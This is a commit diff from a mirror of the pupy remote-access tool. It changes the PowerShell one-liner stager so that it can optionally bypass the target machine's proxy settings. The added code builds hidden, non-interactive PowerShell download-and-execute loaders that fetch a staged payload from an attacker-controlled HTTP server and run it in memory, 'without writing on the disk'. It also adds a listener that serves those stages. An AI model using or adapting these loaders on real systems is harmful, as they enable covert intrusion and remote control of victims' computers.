Rooba
/
pupy
mirror of https://github.com/n1nj4sec/pupy.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

ps1_oneliner can be started without target's proxy configuration

This commit is contained in:
quentinhardy 2016-10-19 12:08:25 -04:00
parent 1e74076749
commit b86d0ba4e0
2 changed files with 51 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
pupy/pupygen.py
View File

@ -291,6 +291,8 @@ if __name__=="__main__":
parser.add_argument('-s', '--scriptlet', default=[], action='append', help="offline python scriptlets to execute before starting the connection. Multiple scriptlets can be privided.") parser.add_argument('-s', '--scriptlet', default=[], action='append', help="offline python scriptlets to execute before starting the connection. Multiple scriptlets can be privided.")
parser.add_argument('-l', '--list', action=ListOptions, nargs=0, help="list available formats, transports, scriptlets and options") parser.add_argument('-l', '--list', action=ListOptions, nargs=0, help="list available formats, transports, scriptlets and options")
parser.add_argument('-i', '--interface', default=None, help="The default interface to listen on") parser.add_argument('-i', '--interface', default=None, help="The default interface to listen on")
parser.add_argument('--no-use-proxy', action='store_true', help="Don't use the target's proxy configuration even if it is used by target (for ps1_oneliner only for now)")
parser.add_argument('--ps1-oneliner-listen-port', default=8080, type=int, help="Port used by ps1_oneliner listener (default: %(default)s)")
parser.add_argument('--randomize-hash', action='store_true', help="add a random string in the exe to make it's hash unknown") parser.add_argument('--randomize-hash', action='store_true', help="add a random string in the exe to make it's hash unknown")
parser.add_argument('--debug-scriptlets', action='store_true', help="don't catch scriptlets exceptions on the client for debug purposes") parser.add_argument('--debug-scriptlets', action='store_true', help="don't catch scriptlets exceptions on the client for debug purposes")
parser.add_argument('--workdir', help='Set Workdir (Default = current workdir)') parser.add_argument('--workdir', help='Set Workdir (Default = current workdir)')
@ -435,9 +437,11 @@ if __name__=="__main__":
w.write("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode, x64ConcatCode[:-1]) )) w.write("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode, x64ConcatCode[:-1]) ))
elif args.format=="ps1_oneliner": elif args.format=="ps1_oneliner":
from pupylib.payloads.ps1_oneliner import serve_ps1_payload from pupylib.payloads.ps1_oneliner import serve_ps1_payload
i=conf["launcher_args"].index("--host")+1 link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0]
link_ip=conf["launcher_args"][i].split(":",1)[0] if args.no_use_proxy == True:
serve_ps1_payload(conf, link_ip=link_ip) serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=False)
else:
serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=True)
elif args.format=="rubber_ducky": elif args.format=="rubber_ducky":
rubber_ducky(conf).generateAllForOStarget() rubber_ducky(conf).generateAllForOStarget()
else: else:

32
pupy/pupylib/payloads/ps1_oneliner.py
View File

@ -19,7 +19,8 @@ ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..",".."))
#url_random_one = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5)) #url_random_one = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5))
#url_random_two = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5)) #url_random_two = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5))
### url_random_one and url_random_two variables are fixed because if you break you ps1_neliner listener, the payload will be not be able to get stages -:(
### "url_random_one" and "url_random_two" variables are fixed because if you break you ps1_listener listener, the ps1_listener payload will not be able to get stages -:(
url_random_one = "eiloShaegae1" url_random_one = "eiloShaegae1"
url_random_two = "IMo8oosieVai" url_random_two = "IMo8oosieVai"
@ -88,9 +89,16 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
self.send_response(200) self.send_response(200)
self.send_header('Content-type','text/html') self.send_header('Content-type','text/html')
self.end_headers() self.end_headers()
if self.server.useTargetProxy == True:
launcher = """ print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format( launcher = """IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(
server=self.server.link_ip,
port=self.server.link_port,
url_random_two=url_random_two
)
else:
print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
launcher = """$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://{server}:{port}/{url_random_two}'));""".format(
server=self.server.link_ip, server=self.server.link_ip,
port=self.server.link_port, port=self.server.link_port,
url_random_two=url_random_two url_random_two=url_random_two
@ -115,12 +123,13 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
return return
class ps1_HTTPServer(HTTPServer): class ps1_HTTPServer(HTTPServer):
def __init__(self, server_address, conf, link_ip, link_port, ssl): def __init__(self, server_address, conf, link_ip, link_port, ssl, useTargetProxy):
self.payload_conf = conf self.payload_conf = conf
self.link_ip=link_ip self.link_ip=link_ip
self.link_port=link_port self.link_port=link_port
self.aes_key=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,16)]) # must be 16 char long for aes 128 self.aes_key=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,16)]) # must be 16 char long for aes 128
self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))]) # must be 16 char long for aes 128 self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))]) # must be 16 char long for aes 128
self.useTargetProxy = useTargetProxy
HTTPServer.__init__(self, server_address, PupyPayloadHTTPHandler) HTTPServer.__init__(self, server_address, PupyPayloadHTTPHandler)
if ssl: if ssl:
config = configparser.ConfigParser() config = configparser.ConfigParser()
@ -129,11 +138,11 @@ class ps1_HTTPServer(HTTPServer):
certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep) certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep)
self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True) self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True)
def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=False): def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=False, useTargetProxy=True):
try: try:
while True: while True:
try: try:
server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl) server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl, useTargetProxy)
break break
except Exception as e: except Exception as e:
# [Errno 98] Adress already in use # [Errno 98] Adress already in use
@ -143,11 +152,16 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="<your_ip>", ssl=Fa
raise raise
print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :" print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :"
print " --- " print " --- "
if useTargetProxy == True:
oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green") oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
# This line could work check when proxy is used (have to be tested) message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow")
# oneliner=colorize("powershell.exe -w hidden -noni -nop -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://%s:%s/pa')"%(link_ip, port), "green") else:
oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://%s:%s/%s'));\""%(link_ip, port, url_random_one), "green")
message= colorize("Please note that even if the target's system uses a proxy, this previous powershell command will not use the proxy for downloading pupy", "yellow")
print oneliner print oneliner
print " --- " print " --- "
print message
print " --- "
print colorize("[+] ","green")+'Started http server on %s:%s '%(ip, port) print colorize("[+] ","green")+'Started http server on %s:%s '%(ip, port)
print colorize("[+] ","green")+'waiting for a connection ...' print colorize("[+] ","green")+'waiting for a connection ...'